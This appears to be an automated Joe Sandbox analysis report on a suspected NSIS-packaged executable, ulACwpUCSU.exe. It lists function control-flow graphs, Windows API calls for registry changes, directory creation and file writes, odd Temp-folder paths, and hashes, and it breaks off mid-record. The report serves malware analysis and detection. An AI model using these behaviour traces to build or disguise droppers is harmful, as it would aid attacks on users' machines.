                                          control_flow_graph 545 40173f-401762 call 4029fd call 405833 550 401764-40176a call 405d36 545->550 551 40176c-40177e call 405d36 call 4057c6 lstrcatA 545->551 557 401783-401789 call 405fa1 550->557 551->557 561 40178e-401792 557->561 562 401794-40179e call 40603a 561->562 563 4017c5-4017c8 561->563 571 4017b0-4017c2 562->571 572 4017a0-4017ae CompareFileTime 562->572 565 4017d0-4017ec call 4059c7 563->565 566 4017ca-4017cb call 4059a2 563->566 573 401864-40188d call 40501f call 402f1f 565->573 574 4017ee-4017f1 565->574 566->565 571->563 572->571 588 401895-4018a1 SetFileTime 573->588 589 40188f-401893 573->589 575 4017f3-401835 call 405d36 * 2 call 405d58 call 405d36 call 40554a 574->575 576 401846-401850 call 40501f 574->576 575->561 609 40183b-40183c 575->609 586 401859-40185f 576->586 590 40289b 586->590 592 4018a7-4018b2 CloseHandle 588->592 589->588 589->592 593 40289d-4028a1 590->593 595 402892-402895 592->595 596 4018b8-4018bb 592->596 595->590 598 4018d0-4018d3 call 405d58 596->598 599 4018bd-4018ce call 405d58 lstrcatA 596->599 604 4018d8-40222b call 40554a 598->604 599->604 604->593 609->586 611 40183e-40183f 609->611 611->576
                                          APIs
                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste,00000000,00000000,00000031), ref: 0040177E
                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste,00000000,00000000,00000031), ref: 004017A8
                                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll), ref: 0040508D
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp$C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste$Call
                                          • API String ID: 1941528284-607170145
                                          • Opcode ID: 3aa427727347f9e8141c62517debd6c6d5f1ffb41e66c3134885ff25fefb9c69
                                          • Instruction ID: 7da2985f373e49f587e0f88560f455237d5d3a700d2e38046b33ad83bb6d7614
                                          • Opcode Fuzzy Hash: 3aa427727347f9e8141c62517debd6c6d5f1ffb41e66c3134885ff25fefb9c69
                                          • Instruction Fuzzy Hash: 0341B871910515BACF10BFA5DC46DAF3679DF41369F20823BF511F10E1D63C8A419A6E
                                          Function 0040501F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 612 40501f-405034 613 4050ea-4050ee 612->613 614 40503a-40504c 612->614 615 405057-405063 lstrlenA 614->615 616 40504e-405052 call 405d58 614->616 618 405080-405084 615->618 619 405065-405075 lstrlenA 615->619 616->615 621 405093-405097 618->621 622 405086-40508d SetWindowTextA 618->622 619->613 620 405077-40507b lstrcatA 619->620 620->618 623 405099-4050db SendMessageA * 3 621->623 624 4050dd-4050df 621->624 622->621 623->624 624->613 625 4050e1-4050e4 624->625 625->613
                                          APIs
                                          • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                          • lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                          • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                          • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll), ref: 0040508D
                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll
                                          • API String ID: 2531174081-788293933
                                          • Opcode ID: ee1b08cb592492bdf5f80b5dae1b552c690ecdeff46defc75ce9aeeb2979dc18
                                          • Instruction ID: 2b33129011dff48d1edd85efe61027b37dbb0349f6b457de8e93b882053e083c
                                          • Opcode Fuzzy Hash: ee1b08cb592492bdf5f80b5dae1b552c690ecdeff46defc75ce9aeeb2979dc18
                                          • Instruction Fuzzy Hash: C2219071900508BBDB119FA5CD84ADFBFB9EF14354F14807AF544B6290C2794E45DFA8
                                          Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 626 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 633 402892-4028a1 626->633 634 402368-402370 626->634 635 402380-402383 634->635 636 402372-40237f call 4029fd lstrlenA 634->636 640 402393-402396 635->640 641 402385-402392 call 4029e0 635->641 636->635 642 4023a7-4023bb RegSetValueExA 640->642 643 402398-4023a2 call 402f1f 640->643 641->640 647 4023c0-402496 RegCloseKey 642->647 648 4023bd 642->648 643->642 647->633 651 402663-40266a 647->651 648->647 651->633
                                          APIs
                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CloseCreateValuelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp
                                          • API String ID: 1356686001-2804558785
                                          • Opcode ID: 86a468557908f0d4cc1937d8ef59051a5efb18d14e0f25ee016bd79e191944f1
                                          • Instruction ID: 937c1904c824b73ffe337d2eacc138a1f8ac1658d2030852d1a46e58dbdf142b
                                          • Opcode Fuzzy Hash: 86a468557908f0d4cc1937d8ef59051a5efb18d14e0f25ee016bd79e191944f1
                                          • Instruction Fuzzy Hash: D71172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668
                                          Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 652 4015b3-4015c6 call 4029fd call 40585f 657 4015c8-4015e3 call 4057f1 CreateDirectoryA 652->657 658 40160a-40160d 652->658 666 401600-401608 657->666 667 4015e5-4015f0 GetLastError 657->667 659 401638-402181 call 401423 658->659 660 40160f-40162a call 401423 call 405d36 SetCurrentDirectoryA 658->660 673 402892-4028a1 659->673 660->673 675 401630-401633 660->675 666->657 666->658 670 4015f2-4015fb GetFileAttributesA 667->670 671 4015fd 667->671 670->666 670->671 671->666 675->673
                                          APIs
                                            • Part of subcall function 0040585F: CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040586D
                                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste,00000000,00000000,000000F0), ref: 00401622
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste, xrefs: 00401617
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                          • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste
                                          • API String ID: 3751793516-994438828
                                          • Opcode ID: db51a681e4e1b110c4379ef5fee21ee97cfdebff7cd263ace0e336009ceda904
                                          • Instruction ID: decf54c0780f34986dcb1f6dc2400c6331eb5c21fa926316ee50895bb5337331
                                          • Opcode Fuzzy Hash: db51a681e4e1b110c4379ef5fee21ee97cfdebff7cd263ace0e336009ceda904
                                          • Instruction Fuzzy Hash: CE11E931908150ABDB217F755D4496F67B4EA62365728473FF891B22D2C23C4D42E62E
                                          Function 004059F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 678 4059f6-405a00 679 405a01-405a2c GetTickCount GetTempFileNameA 678->679 680 405a3b-405a3d 679->680 681 405a2e-405a30 679->681 683 405a35-405a38 680->683 681->679 682 405a32 681->682 682->683
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405A0A
                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A24
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-154622100
                                          • Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                          • Instruction ID: 2f7b9810ed7c5924072585cf2130ed1295747d9915b618abfa336aedeca5813d
                                          • Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                          • Instruction Fuzzy Hash: C1F0E2327482487BDB008F1ADC44B9B7B9CDF91710F00C03BF904AA280D2B0A8008B68
                                          Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 684 402a3d-402a66 RegOpenKeyExA 685 402ad1-402ad5 684->685 686 402a68-402a73 684->686 687 402a8e-402a9e RegEnumKeyA 686->687 688 402aa0-402ab2 RegCloseKey call 406061 687->688 689 402a75-402a78 687->689 696 402ab4-402ac3 688->696 697 402ad8-402ade 688->697 690 402ac5-402ac8 RegCloseKey 689->690 691 402a7a-402a8c call 402a3d 689->691 693 402ace-402ad0 690->693 691->687 691->688 693->685 696->685 697->693 699 402ae0-402aee RegDeleteKeyA 697->699 699->693 701 402af0 699->701 701->685
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                          • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                          • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 921281f3cc01420fdc1beeb1eeb708213ab33a1a3c9c72e215a90ba7be82d26f
                                          • Instruction ID: 1cfc72d501241f28ff1c9237e437913a5e8660848d06dce24e2e83bd327c9a1b
                                          • Opcode Fuzzy Hash: 921281f3cc01420fdc1beeb1eeb708213ab33a1a3c9c72e215a90ba7be82d26f
                                          • Instruction Fuzzy Hash: EA114F71A00108FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0DBB49E559F69
                                          Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 702 100016bd-100016f9 call 10001a5d 706 1000180a-1000180c 702->706 707 100016ff-10001703 702->707 708 10001705-1000170b call 100021b0 707->708 709 1000170c-10001719 call 100021fa 707->709 708->709 714 10001749-10001750 709->714 715 1000171b-10001720 709->715 716 10001770-10001774 714->716 717 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 714->717 718 10001722-10001723 715->718 719 1000173b-1000173e 715->719 724 100017b2-100017b8 call 100023da 716->724 725 10001776-100017b0 call 10001559 call 100023da 716->725 741 100017b9-100017bd 717->741 722 10001725-10001726 718->722 723 1000172b-1000172c call 100027ec 718->723 719->714 720 10001740-10001741 call 10002aa7 719->720 733 10001746 720->733 729 10001733-10001739 call 1000258d 722->729 730 10001728-10001729 722->730 736 10001731 723->736 724->741 725->741 740 10001748 729->740 730->714 730->723 733->740 736->733 740->714 745 100017fa-10001801 741->745 746 100017bf-100017cd call 100023a0 741->746 745->706 748 10001803-10001804 GlobalFree 745->748 752 100017e5-100017ec 746->752 753 100017cf-100017d2 746->753 748->706 752->745 755 100017ee-100017f9 call 100014e2 752->755 753->752 754 100017d4-100017dc 753->754 754->752 756 100017de-100017df FreeLibrary 754->756 755->745 756->752
                                          APIs
                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                          • GlobalFree.KERNEL32(00000000), ref: 10001768
                                          • FreeLibrary.KERNEL32(?), ref: 100017DF
                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                            • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                            • Part of subcall function 1000258D: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FF
                                            • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                          • String ID:
                                          • API String ID: 1791698881-3916222277
                                          • Opcode ID: cd3a49c7226bd267e48e570e062e78a21ab1dc0dccc3f926e80528383bd8a00b
                                          • Instruction ID: 946e86dc2be410c0748ecba0c1d48508df540d87c222276c6f0f58241c559a10
                                          • Opcode Fuzzy Hash: cd3a49c7226bd267e48e570e062e78a21ab1dc0dccc3f926e80528383bd8a00b
                                          • Instruction Fuzzy Hash: C5318B79408205DAFB41DF649CC5BCA37ECFB042D5F018465FA0A9A09ADF78A8458A60
                                          Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 759 401bb8-401bd0 call 4029e0 * 2 764 401bd2-401bd9 call 4029fd 759->764 765 401bdc-401be0 759->765 764->765 767 401be2-401be9 call 4029fd 765->767 768 401bec-401bf2 765->768 767->768 771 401bf4-401c08 call 4029e0 * 2 768->771 772 401c38-401c5e call 4029fd * 2 FindWindowExA 768->772 783 401c28-401c36 SendMessageA 771->783 784 401c0a-401c26 SendMessageTimeoutA 771->784 782 401c64 772->782 785 401c67-401c6a 782->785 783->782 784->785 786 401c70 785->786 787 402892-4028a1 785->787 786->787
                                          APIs
                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                          • Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
                                          • Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                          • Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728
                                          Function 0040303A Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 0040304F
                                            • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                          • WriteFile.KERNELBASE(0040A8A0,0040DF4B,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                          • SetFilePointer.KERNELBASE(000059BC,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$Pointer$CountTickWrite
                                          • String ID:
                                          • API String ID: 2146148272-0
                                          • Opcode ID: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                                          • Instruction ID: 01a25493adf58fb9a894681412e440a2e883d4234beea4965eba9eb13e735820
                                          • Opcode Fuzzy Hash: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                                          • Instruction Fuzzy Hash: CC414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389D52CB5E
                                          Function 00401F68 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
